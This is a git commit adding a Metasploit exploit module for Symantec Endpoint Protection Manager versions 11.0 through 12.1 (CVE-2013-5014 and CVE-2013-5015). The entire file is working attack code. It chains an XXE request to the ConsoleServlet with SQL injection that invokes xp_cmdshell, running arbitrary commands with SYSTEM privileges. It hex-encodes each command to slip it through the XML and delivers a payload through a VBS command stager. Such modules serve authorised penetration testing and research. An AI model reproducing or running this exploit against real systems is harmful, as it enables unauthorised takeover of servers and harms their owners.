Added Symantec Endpoint Protection Manager RCE

2014-02-24 15:01:13 +07:00 · 2014-02-24 15:01:13 +07:00 · 8e3f70851d
parent f766a74150
commit 8e3f70851d
1 changed files with 138 additions and 0 deletions
--- a/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
+++ b/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
+      'Description'    => %q{
+        This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
+        versions 11.0, 12.0 and 12.1.
+        When supplying a specially crafted XXE request to '/servlet/ConsoleServlet?ActionType=ConsoleLog', an
+        attacker can request the 'http://127.0.0.1:9090/servlet/ConsoleServlet' url by injecting arbitrary SQL
+        statements into the 'Parameter' parameter. As xp_cmdshell is enabled in the included database instance,
+        it's possible to execute arbitrary system commands on the remote system with SYSTEM privileges.
+      },
+      'Author'         =>
+        [
+          'Stefan Viehbock', # Discovery
+          'Chris Graham', # PoC exploit
+          'xistence <xistence[at]0x90.nl>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ],
+          [ 'EDB', '31853'],
+          [ 'CVE', '2013-5014' ],
+          [ 'CVE', '2013-5015' ]
+        ],
+      'Targets'	=>
+        [
+          [ 'Windows Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'Privileged' => true,
+      'Platform' => 'win',
+      'DisclosureDate' => 'Feb 24 2014',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(9090),
+        OptBool.new('SSL',   [ true, 'Use SSL', false ]),
+        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi(
+      {
+        'uri'   =>  normalize_uri(target_uri.path),
+        'method' => 'GET',
+      })
+
+    if res and res.code == 200 and res.body =~ /Symantec Endpoint Protection Manager/ and res.body =~ /1995 - 2013 Symantec Corporation/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def windows_stager
+
+    # Random exe name
+    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
+    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending payload")
+    # Execute the cmdstager, max length of the commands is ~3950
+    execute_cmdstager({:linemax => 3950})
+
+  end
+
+  def execute_command(cmd, opts = {})
+
+    # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
+    command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
+
+    # Generate random 'xx032xxxx' sequence number.
+    seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
+
+    soap = %Q|<?xml version=\"1.0\" encoding=\"UTF-8\"?>
+<!DOCTYPE sepm [<!ENTITY payload SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >]>
+<request>
+<xxe>&payload;</xxe>
+</request>|
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
+    xxe = post_data.to_s
+
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+        'method' => 'POST',
+        'vars_get' => { 'ActionType' => 'ConsoleLog' },
+        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+        'data' => xxe,
+      })
+
+    if res and res.body !~ /ResponseCode/
+        fail_with(Failure::Unknown, "#{datastore['RHOST']}:#{datastore['RPORT']} - Something went wrong.")
+    end
+
+  end
+
+  def exploit
+
+    if not datastore['CMD'].empty?
+      print_status("Executing command '#{datastore['CMD']}'")
+      execute_command(datastore['CMD'])
+      return
+    end
+
+    case target['Platform']
+      when 'win'
+        windows_stager
+      else
+        fail_with(Failure::Unknown, 'Target not supported.')
+    end
+
+    handler
+
+  end
+end
+